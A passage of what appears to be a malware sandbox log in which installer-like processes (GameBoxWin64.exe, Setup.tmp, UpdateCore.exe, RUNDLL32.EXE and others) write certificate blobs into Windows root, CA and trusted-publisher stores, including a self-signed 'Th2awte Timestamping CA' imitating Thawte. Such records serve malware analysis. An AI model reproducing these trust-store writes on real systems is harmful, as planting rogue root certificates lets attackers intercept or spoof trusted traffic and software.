a9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04 RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04\Blob = 5c000000010000000400000000040000040000000100000010000000938ea0f1fa1b4bcab80da1bbedb37c0c1400000001000000140000002ac113c4ddc9f98d03b1fc9ba729bdf7cc1657f4030000000100000014000000bd518f1d8a57959ca3f1dbb764939ccfa4d23d040f0000000100000020000000a6dc2db563b0db49f821ccbd39e9beb086cd464716edc68d2c118f9449b388a61900000001000000100000000e1e1e16b898a43dddcb96b95a90065c2000000001000000a20200003082029e30820207a00302010202084fd2097d021087ca300d06092a864886f70d01010b050030753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3139303832353233303530395a170d3233303832343233303530395a30753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100c9437a619b80799314373f2761fc356001fac81185e4ebfcab82c3b3da9e7e3c72b9419d27efafcf9512cb607b92585436dc4205809f6fd9bc1ea0600d8788d3b0106b73a4e562cb8794561273ee6c493af38be0045b2f4f23beee80f8ebd605a8f11fecaf880d1480e37a352507f2231dcb97cecb18c73a790769eabe3ea17f0203010001a3373035300f0603551d130101ff040530030101ff30220603551d11041b30198217546832617774652054696d657374616d70696e67204341300d06092a864886f70d01010b050003818100b80387219e06244e9e66391b3bb226d6c06fddbdb0a03ac7ee686e2f70a4b62bb6c918915f8e195380d1ee4c3e09f4c688b9fd86ef35f93f9c2ee94b426a972089c08039023d1c9e306b3e5aade9cc226898d0d2acebe25bc2507a2508dae4fb82c9bb4e80b1b3a11a64651609ed092bb5c956a03939b46fa2fe86d86db3ed2c UpdateCore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04\Blob = 030000000100000014000000bd518f1d8a57959ca3f1dbb764939ccfa4d23d042000000001000000a20200003082029e30820207a00302010202084fd2097d021087ca300d06092a864886f70d01010b050030753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3139303832353233303530395a170d3233303832343233303530395a30753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100c9437a619b80799314373f2761fc356001fac81185e4ebfcab82c3b3da9e7e3c72b9419d27efafcf9512cb607b92585436dc4205809f6fd9bc1ea0600d8788d3b0106b73a4e562cb8794561273ee6c493af38be0045b2f4f23beee80f8ebd605a8f11fecaf880d1480e37a352507f2231dcb97cecb18c73a790769eabe3ea17f0203010001a3373035300f0603551d130101ff040530030101ff30220603551d11041b30198217546832617774652054696d657374616d70696e67204341300d06092a864886f70d01010b050003818100b80387219e06244e9e66391b3bb226d6c06fddbdb0a03ac7ee686e2f70a4b62bb6c918915f8e195380d1ee4c3e09f4c688b9fd86ef35f93f9c2ee94b426a972089c08039023d1c9e306b3e5aade9cc226898d0d2acebe25bc2507a2508dae4fb82c9bb4e80b1b3a11a64651609ed092bb5c956a03939b46fa2fe86d86db3ed2c RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04\Blob = 040000000100000010000000938ea0f1fa1b4bcab80da1bbedb37c0c1400000001000000140000002ac113c4ddc9f98d03b1fc9ba729bdf7cc1657f4030000000100000014000000bd518f1d8a57959ca3f1dbb764939ccfa4d23d040f0000000100000020000000a6dc2db563b0db49f821ccbd39e9beb086cd464716edc68d2c118f9449b388a61900000001000000100000000e1e1e16b898a43dddcb96b95a90065c5c0000000100000004000000000400002000000001000000a20200003082029e30820207a00302010202084fd2097d021087ca300d06092a864886f70d01010b050030753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3139303832353233303530395a170d3233303832343233303530395a30753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100c9437a619b80799314373f2761fc356001fac81185e4ebfcab82c3b3da9e7e3c72b9419d27efafcf9512cb607b92585436dc4205809f6fd9bc1ea0600d8788d3b0106b73a4e562cb8794561273ee6c493af38be0045b2f4f23beee80f8ebd605a8f11fecaf880d1480e37a352507f2231dcb97cecb18c73a790769eabe3ea17f0203010001a3373035300f0603551d130101ff040530030101ff30220603551d11041b30198217546832617774652054696d657374616d70696e67204341300d06092a864886f70d01010b050003818100b80387219e06244e9e66391b3bb226d6c06fddbdb0a03ac7ee686e2f70a4b62bb6c918915f8e195380d1ee4c3e09f4c688b9fd86ef35f93f9c2ee94b426a972089c08039023d1c9e306b3e5aade9cc226898d0d2acebe25bc2507a2508dae4fb82c9bb4e80b1b3a11a64651609ed092bb5c956a03939b46fa2fe86d86db3ed2c Taexaeshocife.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BD518F1D8A57959CA3F1DBB764939CCFA4D23D04\Blob = 040000000100000010000000938ea0f1fa1b4bcab80da1bbedb37c0c1400000001000000140000002ac113c4ddc9f98d03b1fc9ba729bdf7cc1657f4030000000100000014000000bd518f1d8a57959ca3f1dbb764939ccfa4d23d040f0000000100000020000000a6dc2db563b0db49f821ccbd39e9beb086cd464716edc68d2c118f9449b388a62000000001000000a20200003082029e30820207a00302010202084fd2097d021087ca300d06092a864886f70d01010b050030753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c65301e170d3139303832353233303530395a170d3233303832343233303530395a30753120301e06035504030c17546832617774652054696d657374616d70696e67204341311d301b060355040b0c145468617774652043657274696669636174696f6e310f300d060355040a0c06546861777465310b3009060355040613025a413114301206035504070c0b44757262616e76696c6c6530819f300d06092a864886f70d010101050003818d0030818902818100c9437a619b80799314373f2761fc356001fac81185e4ebfcab82c3b3da9e7e3c72b9419d27efafcf9512cb607b92585436dc4205809f6fd9bc1ea0600d8788d3b0106b73a4e562cb8794561273ee6c493af38be0045b2f4f23beee80f8ebd605a8f11fecaf880d1480e37a352507f2231dcb97cecb18c73a790769eabe3ea17f0203010001a3373035300f0603551d130101ff040530030101ff30220603551d11041b30198217546832617774652054696d657374616d70696e67204341300d06092a864886f70d01010b050003818100b